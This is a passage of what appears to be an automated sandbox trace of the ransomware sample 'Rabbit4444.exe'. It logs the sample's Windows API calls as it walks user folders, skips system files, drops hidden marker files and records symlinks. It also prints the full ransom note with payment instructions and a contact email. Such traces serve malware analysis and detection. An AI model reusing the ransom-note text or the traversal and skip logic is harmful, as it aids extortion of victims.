dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0060.001] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0060.001] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0060.001] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3" [0060.001] CreateFileW (lpFileName="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0060.004] ReadFile (in: hFile=0x298, lpBuffer=0x11cc748, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc744, lpOverlapped=0x0 | out: lpBuffer=0x11cc748*, lpNumberOfBytesRead=0x11cc744*=0x3d4, lpOverlapped=0x0) returned 1 [0060.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105560 [0060.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1257e8 [0060.004] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0060.004] lstrlenA (lpString="{{ID}}") returned 6 [0060.004] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0060.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x1258f0 [0060.004] CloseHandle (hObject=0x298) returned 1 [0060.004] GetLastError () returned 0x0 [0060.004] lstrlenW (lpString="C:\\Users\\Default") returned 16 [0060.004] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.004] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe5df2792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0060.005] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.005] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.005] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.005] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.005] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe5df2792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.005] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.005] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.005] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.006] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.006] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.006] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5df2792, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5df2792, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5df2792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.006] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.006] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.006] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0060.006] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0060.006] lstrcpyW (in: lpString1=0x11ceb82, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0060.006] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0060.006] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0060.006] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3" [0060.006] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.294] WriteFile (in: hFile=0x260, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.305] FlushFileBuffers (hFile=0x260) returned 1 [0060.311] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.317] CloseHandle (hObject=0x260) returned 1 [0060.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0060.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x1028d0 [0060.321] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0x1222e8 | out: ListHead=0xf6750, ListEntry=0x1222e8) returned 0x0 [0060.322] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0060.323] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.323] lstrcmpiW (lpString1="Application Data", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.323] lstrcmpiW (lpString1="Application Data", lpString2="Rabbit4444.exe") returned -1 [0060.324] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0060.325] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0060.325] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0060.326] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0060.326] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0060.327] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0060.327] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0060.327] lstrcmpiW (lpString1="Application Data", lpString2="NTUSER.DAT") returned -1 [0060.327] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0060.328] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Application Data", dwFileAttributes=0x2412) returned 1 [0060.332] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Application Data\r\n") returned 52 [0060.333] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Application Data\r\n") returned 52 [0060.333] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.336] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd0 [0060.336] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x34, lpOverlapped=0x0) returned 1 [0060.340] CloseHandle (hObject=0x260) returned 1 [0060.341] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="Rabbit4444.exe") returned -1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2=".") returned 1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="..") returned 1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="windows") returned -1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="bootmgr") returned 1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="pagefile.sys") returned -1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="boot") returned 1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="ids.txt") returned -1 [0060.341] lstrcmpiW (lpString1="Cookies", lpString2="NTUSER.DAT") returned -1 [0060.341] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Cookies" | out: lpString1="Cookies") returned="Cookies" [0060.341] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Cookies", dwFileAttributes=0x2412) returned 1 [0060.341] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Cookies\r\n") returned 43 [0060.342] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Cookies\r\n") returned 43 [0060.342] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.342] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc04 [0060.342] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x2b, lpOverlapped=0x0) returned 1 [0060.347] CloseHandle (hObject=0x260) returned 1 [0060.350] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0060.350] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.351] lstrcmpiW (lpString1="Desktop", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.352] lstrcmpiW (lpString1="Desktop", lpString2="Rabbit4444.exe") returned -1 [0060.352] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0060.352] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0060.352] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0060.353] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0060.355] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0060.356] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0060.357] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0060.357] lstrcmpiW (lpString1="Desktop", lpString2="NTUSER.DAT") returned -1 [0060.357] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0060.358] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Desktop", dwFileAttributes=0x10) returned 1 [0060.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0060.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102410 [0060.363] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x1221a8 | out: ListHead=0x122128, ListEntry=0x1221a8) returned 0x0 [0060.363] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="Rabbit4444.exe") returned -1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0060.363] lstrcmpiW (lpString1="Documents", lpString2="NTUSER.DAT") returned -1 [0060.363] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0060.363] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Documents", dwFileAttributes=0x10) returned 1 [0060.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0060.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x36) returned 0x102590 [0060.364] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x121fe8 | out: ListHead=0x122128, ListEntry=0x121fe8) returned 0x1221a8 [0060.364] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="Rabbit4444.exe") returned -1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0060.364] lstrcmpiW (lpString1="Downloads", lpString2="NTUSER.DAT") returned -1 [0060.364] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0060.364] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Downloads", dwFileAttributes=0x10) returned 1 [0060.365] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0060.365] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x36) returned 0x102890 [0060.365] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x122148 | out: ListHead=0x122128, ListEntry=0x122148) returned 0x121fe8 [0060.365] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="Rabbit4444.exe") returned -1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="bootmgr") returned 1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="pagefile.sys") returned -1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="boot") returned 1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="ids.txt") returned -1 [0060.365] lstrcmpiW (lpString1="Favorites", lpString2="NTUSER.DAT") returned -1 [0060.365] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0060.365] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites", dwFileAttributes=0x10) returned 1 [0060.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0060.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x36) returned 0x102910 [0060.366] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x1221c8 | out: ListHead=0x122128, ListEntry=0x1221c8) returned 0x122148 [0060.366] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.366] lstrcmpiW (lpString1="Links", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="Rabbit4444.exe") returned -1 [0060.366] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="bootmgr") returned 1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="pagefile.sys") returned -1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="boot") returned 1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="ids.txt") returned 1 [0060.366] lstrcmpiW (lpString1="Links", lpString2="NTUSER.DAT") returned -1 [0060.366] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Links" | out: lpString1="Links") returned="Links" [0060.366] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Links", dwFileAttributes=0x10) returned 1 [0060.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0060.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2e) returned 0xf7878 [0060.366] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x1221e8 | out: ListHead=0x122128, ListEntry=0x1221e8) returned 0x1221c8 [0060.366] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0060.366] lstrcmpiW (lpString1="Local Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2="Rabbit4444.exe") returned -1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2=".") returned 1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2="..") returned 1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2="windows") returned -1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2="bootmgr") returned 1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2="pagefile.sys") returned -1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2="boot") returned 1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2="ids.txt") returned 1 [0060.367] lstrcmpiW (lpString1="Local Settings", lpString2="NTUSER.DAT") returned -1 [0060.367] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Local Settings" | out: lpString1="Local Settings") returned="Local Settings" [0060.367] SetFileAttributesW 